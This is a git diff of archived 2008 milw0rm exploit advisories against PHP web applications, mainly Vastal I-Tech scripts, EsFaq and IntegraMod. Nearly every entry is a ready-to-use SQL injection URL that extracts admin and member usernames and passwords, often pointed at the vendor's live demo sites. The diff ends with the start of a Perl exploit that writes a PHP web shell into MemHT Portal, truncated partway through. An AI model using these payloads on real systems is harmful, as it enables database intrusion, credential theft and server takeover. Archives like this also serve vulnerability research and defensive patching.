+++ b/platforms/php/webapps/6373.txt
@@ -1,30 +1,30 @@
-#######################################################
-# Vastal I-Tech Visa Zone ( news_id ) SQL Injection Vulnerability
-#
-# Author   : DeViL iRaQ
-#
-# Email     : guitar_lover46[at]yahoo[dot]com
-#
-# Price     : $550.00
-#
-# Script Home Page : http://www.vastal.com/visa-zone-a-specialised-script-made-just-for-law-firm-dealing-in-visa.html
-#
-# Demo      : http://www.vastal.com/law_firm/
-#
-# Dork      : N/A
-########################################################
-# Exploit :
-# www.[sitename].com/view_news.php?news_id=-2+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
-#
-# Live Demo:
-# http://www.vastal.com/law_firm/view_news.php?news_id=-2+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
-#
-# Admin login :
-# http://www.[sitename].com/admin/
-#########################################################
-# Greetz :
-#                      All members of the Forum  WwW.Hussin-X.CoM
-#  Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
-#########################################################
-
-# milw0rm.com [2008-09-05]
+#######################################################
+# Vastal I-Tech Visa Zone ( news_id ) SQL Injection Vulnerability
+#
+# Author   : DeViL iRaQ
+#
+# Email     : guitar_lover46[at]yahoo[dot]com
+#
+# Price     : $550.00
+#
+# Script Home Page : http://www.vastal.com/visa-zone-a-specialised-script-made-just-for-law-firm-dealing-in-visa.html
+#
+# Demo      : http://www.vastal.com/law_firm/
+#
+# Dork      : N/A
+########################################################
+# Exploit :
+# www.[sitename].com/view_news.php?news_id=-2+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
+#
+# Live Demo:
+# http://www.vastal.com/law_firm/view_news.php?news_id=-2+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
+#
+# Admin login :
+# http://www.[sitename].com/admin/
+#########################################################
+# Greetz :
+#                      All members of the Forum  WwW.Hussin-X.CoM
+#  Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
+#########################################################
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6374.txt b/platforms/php/webapps/6374.txt
index 36755f869..75a2f2f2e 100755
--- a/platforms/php/webapps/6374.txt
+++ b/platforms/php/webapps/6374.txt
@@ -1,30 +1,30 @@
-#######################################################
-# Vastal I-Tech Toner Cart ( show_series_ink.php id ) SQL Injection Vulnerability
-#
-# Author   : DeViL iRaQ
-#
-# Email     : guitar_lover46[at]yahoo[dot]com
-#
-# Price     : $400.00
-#
-# Script Home Page : http://www.vastal.com/toner-cart-a-specialized-script-to-help-you-sell-toners-online.html
-#
-# Demo      : http://www.vastal.com/united/
-#
-# Dork      : N/A
-########################################################
-# Exploit :
-# www.[sitename].com/show_series_ink.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
-#
-# Live Demo:
-# http://www.vastal.com/united/show_series_ink.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
-#
-# Admin login :
-# http://www.[sitename].com/admin/
-#########################################################
-# Greetz :
-#                      All members of the Forum  WwW.Hussin-X.CoM
-#  Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
-#########################################################
-
-# milw0rm.com [2008-09-05]
+#######################################################
+# Vastal I-Tech Toner Cart ( show_series_ink.php id ) SQL Injection Vulnerability
+#
+# Author   : DeViL iRaQ
+#
+# Email     : guitar_lover46[at]yahoo[dot]com
+#
+# Price     : $400.00
+#
+# Script Home Page : http://www.vastal.com/toner-cart-a-specialized-script-to-help-you-sell-toners-online.html
+#
+# Demo      : http://www.vastal.com/united/
+#
+# Dork      : N/A
+########################################################
+# Exploit :
+# www.[sitename].com/show_series_ink.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
+#
+# Live Demo:
+# http://www.vastal.com/united/show_series_ink.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
+#
+# Admin login :
+# http://www.[sitename].com/admin/
+#########################################################
+# Greetz :
+#                      All members of the Forum  WwW.Hussin-X.CoM
+#  Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
+#########################################################
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6375.txt b/platforms/php/webapps/6375.txt
index 3f9fabaa9..209878962 100755
--- a/platforms/php/webapps/6375.txt
+++ b/platforms/php/webapps/6375.txt
@@ -1,30 +1,30 @@
-#######################################################
-# Vastal I-Tech Share Zone ( id ) SQL Injection Vulnerability
-#
-# Author   : DeViL iRaQ
-#
-# Email     : guitar_lover46[at]yahoo[dot]com
-#
-# Price     : $200.00
-#
-# Script Home Page : http://www.vastal.com/share-zone-the-file-sharing-software.html
-#
-# Demo      : http://www.vastal.com/rapid/
-#
-# Dork      : N/A
-########################################################
-# Exploit :
-# www.[sitename].com/view_news.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
-#
-# Live Demo:
-# http://www.vastal.com/rapid/view_news.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
-#
-# Admin login :
-# http://www.[sitename].com/admin/
-#########################################################
-# Greetz :
-#                      All members of the Forum  WwW.Hussin-X.CoM
-#  Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
-#########################################################
-
-# milw0rm.com [2008-09-05]
+#######################################################
+# Vastal I-Tech Share Zone ( id ) SQL Injection Vulnerability
+#
+# Author   : DeViL iRaQ
+#
+# Email     : guitar_lover46[at]yahoo[dot]com
+#
+# Price     : $200.00
+#
+# Script Home Page : http://www.vastal.com/share-zone-the-file-sharing-software.html
+#
+# Demo      : http://www.vastal.com/rapid/
+#
+# Dork      : N/A
+########################################################
+# Exploit :
+# www.[sitename].com/view_news.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
+#
+# Live Demo:
+# http://www.vastal.com/rapid/view_news.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
+#
+# Admin login :
+# http://www.[sitename].com/admin/
+#########################################################
+# Greetz :
+#                      All members of the Forum  WwW.Hussin-X.CoM
+#  Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
+#########################################################
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6376.txt b/platforms/php/webapps/6376.txt
index 881c81519..cd0e3494a 100755
--- a/platforms/php/webapps/6376.txt
+++ b/platforms/php/webapps/6376.txt
@@ -1,30 +1,30 @@
-#######################################################
-# Vastal I-Tech DVD Zone ( cat_id ) SQL Injection Vulnerability
-#
-# Author   : DeViL iRaQ
-#
-# Email     : guitar_lover46[at]yahoo[dot]com
-#
-# Price     : $399.99 (:
-#
-# Script Home Page : hhttp://www.vastal.com/dvd-zone-dvd-rental-script.html
-#
-# Demo      : http://dvdzone.vastal.com/
-#
-# Dork      : N/A
-########################################################
-# Exploit :
-# www.[sitename].com/view_mags.php?cat_id=-21+union+select+concat(user_name,0x3a,password)+from+members
-#
-# Live Demo:
-# http://dvdzone.vastal.com/view_mags.php?cat_id=-21+union+select+concat(user_name,0x3a,password)+from+members
-#
-# Admin login :
-# http://www.[sitename].com/admin/
-#########################################################
-# Greetz :
-#                      All members of the Forum  WwW.Hussin-X.CoM
-#  Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
-#########################################################
-
-# milw0rm.com [2008-09-05]
+#######################################################
+# Vastal I-Tech DVD Zone ( cat_id ) SQL Injection Vulnerability
+#
+# Author   : DeViL iRaQ
+#
+# Email     : guitar_lover46[at]yahoo[dot]com
+#
+# Price     : $399.99 (:
+#
+# Script Home Page : hhttp://www.vastal.com/dvd-zone-dvd-rental-script.html
+#
+# Demo      : http://dvdzone.vastal.com/
+#
+# Dork      : N/A
+########################################################
+# Exploit :
+# www.[sitename].com/view_mags.php?cat_id=-21+union+select+concat(user_name,0x3a,password)+from+members
+#
+# Live Demo:
+# http://dvdzone.vastal.com/view_mags.php?cat_id=-21+union+select+concat(user_name,0x3a,password)+from+members
+#
+# Admin login :
+# http://www.[sitename].com/admin/
+#########################################################
+# Greetz :
+#                      All members of the Forum  WwW.Hussin-X.CoM
+#  Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
+#########################################################
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6378.txt b/platforms/php/webapps/6378.txt
index 385f8e53d..b575266ee 100755
--- a/platforms/php/webapps/6378.txt
+++ b/platforms/php/webapps/6378.txt
@@ -1,18 +1,18 @@
-#######################################################
-#  Vastal I-Tech Jobs Zone SQL Injection Vulnerability
-#
-# Author   : Stack
-#
-#
-# Script Home Page : http://www.vastal.com/jobs-zone-classifieds-script.html
-#
-# Demo      : http://www.vastal.com/jobs/
-#######################################################
-Exploit:
-http://site.il/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
-http://site.il/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),version(),4,5,6,7/**/from/**/members/*
-Live Demo
-http://www.vastal.com/jobs/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
-##############################################################################################################
-
-# milw0rm.com [2008-09-05]
+#######################################################
+#  Vastal I-Tech Jobs Zone SQL Injection Vulnerability
+#
+# Author   : Stack
+#
+#
+# Script Home Page : http://www.vastal.com/jobs-zone-classifieds-script.html
+#
+# Demo      : http://www.vastal.com/jobs/
+#######################################################
+Exploit:
+http://site.il/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
+http://site.il/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),version(),4,5,6,7/**/from/**/members/*
+Live Demo
+http://www.vastal.com/jobs/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
+##############################################################################################################
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6379.txt b/platforms/php/webapps/6379.txt
index a2824d4a6..e7c9cc6e7 100755
--- a/platforms/php/webapps/6379.txt
+++ b/platforms/php/webapps/6379.txt
@@ -1,22 +1,22 @@
-#######################################################
-#  Vastal I-Tech MMORPG Zone SQL Injection Vulnerability
-#
-# Author   : Stack
-#
-#
-# Script Home Page : http://www.vastal.com/mmorpg-zone-sell-mmorpg-online.html
-#
-# Demo      : http://www.vastal.com/games/
-#######################################################
-the exploit fate the password
-use ur mind for have the column username
-Exploit:
-http://site.il/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),3,4,5,6/**/members/*
-http://site.il/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,22222,3,4,5,6/*
- 
-Live Demo
-
-http://www.vastal.com/games/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),3,4,5,6/**/members/*
-http://www.vastal.com/games/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,22222,3,4,5,6/*
-
-# milw0rm.com [2008-09-05]
+#######################################################
+#  Vastal I-Tech MMORPG Zone SQL Injection Vulnerability
+#
+# Author   : Stack
+#
+#
+# Script Home Page : http://www.vastal.com/mmorpg-zone-sell-mmorpg-online.html
+#
+# Demo      : http://www.vastal.com/games/
+#######################################################
+the exploit fate the password
+use ur mind for have the column username
+Exploit:
+http://site.il/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),3,4,5,6/**/members/*
+http://site.il/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,22222,3,4,5,6/*
+ 
+Live Demo
+
+http://www.vastal.com/games/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),3,4,5,6/**/members/*
+http://www.vastal.com/games/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,22222,3,4,5,6/*
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6380.txt b/platforms/php/webapps/6380.txt
index bca741f5d..76b1bf6c3 100755
--- a/platforms/php/webapps/6380.txt
+++ b/platforms/php/webapps/6380.txt
@@ -1,18 +1,18 @@
-#######################################################
-#  Vastal I-Tech Mag Zone SQL Injection Vulnerability
-#
-# Author   : Stack
-#
-#
-# Script Home Page : http://www.vastal.com/mag-zone-online-library-system.html
-#
-# Demo      : http://www.vastal.com/mag/
-#######################################################
-the exploit fate the password
-use ur mind for have the column username
-Exploit:
-http://site.il/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
-Live Demo
-http://www.vastal.com/mag/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
-
-# milw0rm.com [2008-09-05]
+#######################################################
+#  Vastal I-Tech Mag Zone SQL Injection Vulnerability
+#
+# Author   : Stack
+#
+#
+# Script Home Page : http://www.vastal.com/mag-zone-online-library-system.html
+#
+# Demo      : http://www.vastal.com/mag/
+#######################################################
+the exploit fate the password
+use ur mind for have the column username
+Exploit:
+http://site.il/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
+Live Demo
+http://www.vastal.com/mag/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6381.txt b/platforms/php/webapps/6381.txt
index 2590de2d9..cc543dfe8 100755
--- a/platforms/php/webapps/6381.txt
+++ b/platforms/php/webapps/6381.txt
@@ -1,18 +1,18 @@
-#######################################################
-#  Vastal I-Tech Freelance Zone SQL Injection Vulnerability
-#
-# Author   : Stack
-#
-#
-# Script Home Page : http://www.vastal.com/freelance-zone-freelance-auction-script.html
-#
-# Demo      : http://www.vastal.com/freelance/
-#######################################################
-the exploit fate the password
-use ur mind for have the column username
-Exploit:
-http://site.il/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*
-Live Demo
-http://www.vastal.com/freelance/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*
-
-# milw0rm.com [2008-09-05]
+#######################################################
+#  Vastal I-Tech Freelance Zone SQL Injection Vulnerability
+#
+# Author   : Stack
+#
+#
+# Script Home Page : http://www.vastal.com/freelance-zone-freelance-auction-script.html
+#
+# Demo      : http://www.vastal.com/freelance/
+#######################################################
+the exploit fate the password
+use ur mind for have the column username
+Exploit:
+http://site.il/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*
+Live Demo
+http://www.vastal.com/freelance/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6382.txt b/platforms/php/webapps/6382.txt
index 4d7d78e9c..bb0c1e0df 100755
--- a/platforms/php/webapps/6382.txt
+++ b/platforms/php/webapps/6382.txt
@@ -1,18 +1,18 @@
-#######################################################
-#  Vastal I-Tech Cosmetics Zone  SQL Injection Vulnerability
-#
-# Author   : Stack
-#
-#
-# Script Home Page : http://www.vastal.com/cosmetics-zone-a-shopping-cart-for-your-cosmetics-shop-online.html
-#
-# Demo      : http://www.vastal.com/cosmetics_zone/
-#######################################################
-
-Exploit:
-http://site.il/view_products_cat.php?cat_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
-Live Demo
-http://www.vastal.com/cosmetics_zone/view_products_cat.php?cat_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
-##############################################################################################################
-
-# milw0rm.com [2008-09-05]
+#######################################################
+#  Vastal I-Tech Cosmetics Zone  SQL Injection Vulnerability
+#
+# Author   : Stack
+#
+#
+# Script Home Page : http://www.vastal.com/cosmetics-zone-a-shopping-cart-for-your-cosmetics-shop-online.html
+#
+# Demo      : http://www.vastal.com/cosmetics_zone/
+#######################################################
+
+Exploit:
+http://site.il/view_products_cat.php?cat_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
+Live Demo
+http://www.vastal.com/cosmetics_zone/view_products_cat.php?cat_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
+##############################################################################################################
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6383.txt b/platforms/php/webapps/6383.txt
index a530b6a58..6db3bf9c3 100755
--- a/platforms/php/webapps/6383.txt
+++ b/platforms/php/webapps/6383.txt
@@ -1,44 +1,44 @@
-|___________________________________________________|
-|
-| EsFaq Remote Sql Injection Exploit
-|
-|___________________________________________________
-|---------------------SuB-ZeRo----------------------|
-|
-|    Author: SuB-ZeRo
-|
-|    Home : www.dz-security.com
-|
-|    email:  FbH@hotmail.com
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script :http://editeurscripts.com/ressources/scripts-php/dl.php?idscript=5
-|
-| DorK   : inurl:questions.php?idcat
-|___________________________________________________|
-Exploit:
-________
- 
-www.[target].com/Script/questions.php?idcat=10 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 FROM admin_users--
- 
- 
-
-L!VE DEMO:
-_________
-http://demo.editeurscripts.com/EsFaq/questions.php?idcat=10 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 FROM admin_users--
-
-____________
- 
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum  www.dz-security.com and www.no-exploit.com
-|
-| My friends : HiSoK4| x.CJP.x | bibi-infi | ThE BuTcHeR | charaf
-| 
-|  and all algeria hackers and all mouslimme
-|__________________________ramadan karim all mouslimme____________________________________________
-
-# milw0rm.com [2008-09-05]
+|___________________________________________________|
+|
+| EsFaq Remote Sql Injection Exploit
+|
+|___________________________________________________
+|---------------------SuB-ZeRo----------------------|
+|
+|    Author: SuB-ZeRo
+|
+|    Home : www.dz-security.com
+|
+|    email:  FbH@hotmail.com
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script :http://editeurscripts.com/ressources/scripts-php/dl.php?idscript=5
+|
+| DorK   : inurl:questions.php?idcat
+|___________________________________________________|
+Exploit:
+________
+ 
+www.[target].com/Script/questions.php?idcat=10 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 FROM admin_users--
+ 
+ 
+
+L!VE DEMO:
+_________
+http://demo.editeurscripts.com/EsFaq/questions.php?idcat=10 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 FROM admin_users--
+
+____________
+ 
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum  www.dz-security.com and www.no-exploit.com
+|
+| My friends : HiSoK4| x.CJP.x | bibi-infi | ThE BuTcHeR | charaf
+| 
+|  and all algeria hackers and all mouslimme
+|__________________________ramadan karim all mouslimme____________________________________________
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6385.txt b/platforms/php/webapps/6385.txt
index 6f6a71922..5d24e63db 100755
--- a/platforms/php/webapps/6385.txt
+++ b/platforms/php/webapps/6385.txt
@@ -1,24 +1,24 @@
-####################Vastal I Tech Shaadi Zone 1.0.9 SQL Injection Vulnerability##########
-
-########By:   e.wiZz!
-########Site: infected.blogger.ba
-########Info: Bosnian Idiot FTW!
-
-########Greetz: str0ke,aluigi,suN8Hclf,0in,Rishi Narang,f34r
-
-
-In the wild...
-
-##############################################################################
-
-#####Info:  Shaadi Zone is the best solution if you are looking to run a matrimonial services services. We have integrated many features which you can use and take full advantage of the matrimonial services. You can run a site like shaadi or bharatmatrimoniy easily.
-
-#####Vulnerability:
-
-http://www.inthewild.xxx/path/keyword_search_action.php?gender=xxx&martial=&fage=xxx&tage=SQL
-
-####PoC on demo site:
-
-http://www.vastal.com/shaadi_zone_1.0.9/keyword_search_action.php?gender=male&martial=&fage=18&tage=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,concat(username,0x3a,password),50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 from users/*
-
-# milw0rm.com [2008-09-05]
+####################Vastal I Tech Shaadi Zone 1.0.9 SQL Injection Vulnerability##########
+
+########By:   e.wiZz!
+########Site: infected.blogger.ba
+########Info: Bosnian Idiot FTW!
+
+########Greetz: str0ke,aluigi,suN8Hclf,0in,Rishi Narang,f34r
+
+
+In the wild...
+
+##############################################################################
+
+#####Info:  Shaadi Zone is the best solution if you are looking to run a matrimonial services services. We have integrated many features which you can use and take full advantage of the matrimonial services. You can run a site like shaadi or bharatmatrimoniy easily.
+
+#####Vulnerability:
+
+http://www.inthewild.xxx/path/keyword_search_action.php?gender=xxx&martial=&fage=xxx&tage=SQL
+
+####PoC on demo site:
+
+http://www.vastal.com/shaadi_zone_1.0.9/keyword_search_action.php?gender=male&martial=&fage=18&tage=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,concat(username,0x3a,password),50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 from users/*
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6388.txt b/platforms/php/webapps/6388.txt
index e363257f7..dc797771a 100755
--- a/platforms/php/webapps/6388.txt
+++ b/platforms/php/webapps/6388.txt
@@ -1,36 +1,36 @@
-########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ##############################
-
-Vastal I-Tech Dating Zone (fage) SQL Injection Vulnerability
-
- author: ZoRLu 
-
-   home: yildirimordulari.org - - - z0rlu.blogspot.com - - - r00tsecurity.org
-
-contact: trt-turk@hotmail.com & ZoRLu@w.cn ( baska msn yok taklitlerden kacInIn )
-
-    Not: msn i ekleyipte densiz densiz konusanIn sulalesini cumle alem .... : ( (
-   
-    Not: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA   : ( (
-
-   dork: "advanced_search_results.php?gender="
-
-########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ##############################
-
-http://localhost/datingzone_path/advanced_search_results.php?gender=Female&fage=18+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users--&tage=20&country%5B%5D=India&community=&photograph=Yes&x=58&y=15
-
-demo:
-
-http://datingzone.vastal.com/advanced_search_results.php?gender=Female&fage=18+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users--&tage=20&country%5B%5D=India&community=&photograph=Yes&x=58&y=15
-
-
-########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ##############################
-
-thanx: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
-
-Efsane: YILDIRIMORDULARI.ORG
-
-Yemisim Alaskasini : ) ) insan1n kendi memleketi gibisi yokk : ) )
-
-########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ##############################
-
-# milw0rm.com [2008-09-06]
+########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ##############################
+
+Vastal I-Tech Dating Zone (fage) SQL Injection Vulnerability
+
+ author: ZoRLu 
+
+   home: yildirimordulari.org - - - z0rlu.blogspot.com - - - r00tsecurity.org
+
+contact: trt-turk@hotmail.com & ZoRLu@w.cn ( baska msn yok taklitlerden kacInIn )
+
+    Not: msn i ekleyipte densiz densiz konusanIn sulalesini cumle alem .... : ( (
+   
+    Not: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA   : ( (
+
+   dork: "advanced_search_results.php?gender="
+
+########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ##############################
+
+http://localhost/datingzone_path/advanced_search_results.php?gender=Female&fage=18+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users--&tage=20&country%5B%5D=India&community=&photograph=Yes&x=58&y=15
+
+demo:
+
+http://datingzone.vastal.com/advanced_search_results.php?gender=Female&fage=18+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users--&tage=20&country%5B%5D=India&community=&photograph=Yes&x=58&y=15
+
+
+########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ##############################
+
+thanx: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
+
+Efsane: YILDIRIMORDULARI.ORG
+
+Yemisim Alaskasini : ) ) insan1n kendi memleketi gibisi yokk : ) )
+
+########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ##############################
+
+# milw0rm.com [2008-09-06]
diff --git a/platforms/php/webapps/6390.txt b/platforms/php/webapps/6390.txt
index 723a9b4eb..ba09953f2 100755
--- a/platforms/php/webapps/6390.txt
+++ b/platforms/php/webapps/6390.txt
@@ -1,21 +1,21 @@
-today i found some major security problem. the issue can be found at all integramod 1.4.x versions.
-explanation of the issue:
-
-all integramod versions do have a backup folder where the daily database backups are stored. the coders 
-of integramod forgott to secure this folder.
-
-example:
-just head to the official page of integramod www.integramod.com. you are being redirected 
-to http://www.integramod.com/forum/ . now just head into the backup folder: http://www.integramod.com/forum/backup.
-As you can see you have full access to all database backups!
--> www.pagename/installpath/backup/ directly leads to the database backups!
-notice: some versions do have a index.html in the folder but it is easy to get the backups any way 
-bacause they are alway stored in the dame format:
-backup-yyyy-dd-mm.sql
-
-
-greetings from germany
-
-TheJT 
-
-# milw0rm.com [2008-09-06]
+today i found some major security problem. the issue can be found at all integramod 1.4.x versions.
+explanation of the issue:
+
+all integramod versions do have a backup folder where the daily database backups are stored. the coders 
+of integramod forgott to secure this folder.
+
+example:
+just head to the official page of integramod www.integramod.com. you are being redirected 
+to http://www.integramod.com/forum/ . now just head into the backup folder: http://www.integramod.com/forum/backup.
+As you can see you have full access to all database backups!
+-> www.pagename/installpath/backup/ directly leads to the database backups!
+notice: some versions do have a index.html in the folder but it is easy to get the backups any way 
+bacause they are alway stored in the dame format:
+backup-yyyy-dd-mm.sql
+
+
+greetings from germany
+
+TheJT 
+
+# milw0rm.com [2008-09-06]
diff --git a/platforms/php/webapps/6392.php b/platforms/php/webapps/6392.php
index b632fa57a..4809ac9b1 100755
--- a/platforms/php/webapps/6392.php
+++ b/platforms/php/webapps/6392.php
@@ -1,141 +1,141 @@
-
-
-# milw0rm.com [2008-09-06]
+
+
+# milw0rm.com [2008-09-06]
diff --git a/platforms/php/webapps/6393.pl b/platforms/php/webapps/6393.pl
index 8121d32d2..d90c88a8b 100755
--- a/platforms/php/webapps/6393.pl
+++ b/platforms/php/webapps/6393.pl
@@ -1,193 +1,193 @@
-#!/usr/bin/perl
-#
-# MemHT Portal <= 3.9.0 Perl exploit
-#
-# discovered & written by Ams
-# ax330d [doggy] gmail [dot] com
-#
-# DESCRIPTION:
-#	Script /inc/inc_statistics.php accepts unfiltered $_COOKIE's,
-#	($_COOKIE['stats_res']) which later goes to MySQL request. So we are able to make
-#	sql injection.
-#	This exploit tries to create shell in /uploads/media/defined.php.
-#
-# NEEDED:
-#	magic_quotes_gpc = off
-#	MySQL should be able to write to file
-#	Know full server path to portal
-
-use strict;
-use warnings;
-use IO::Socket;
-
-print "
-	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-	MemHT portal <= 3.9.0 Perl exploit
-	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-	";
-
-@ARGV or &usage ;
-my $expl_url = shift;
-$expl_url =~ m#http://# or &usage;
-my $serv_path = shift || '-b';
-my $def_shell = '/uploads/media/defined.php';
-
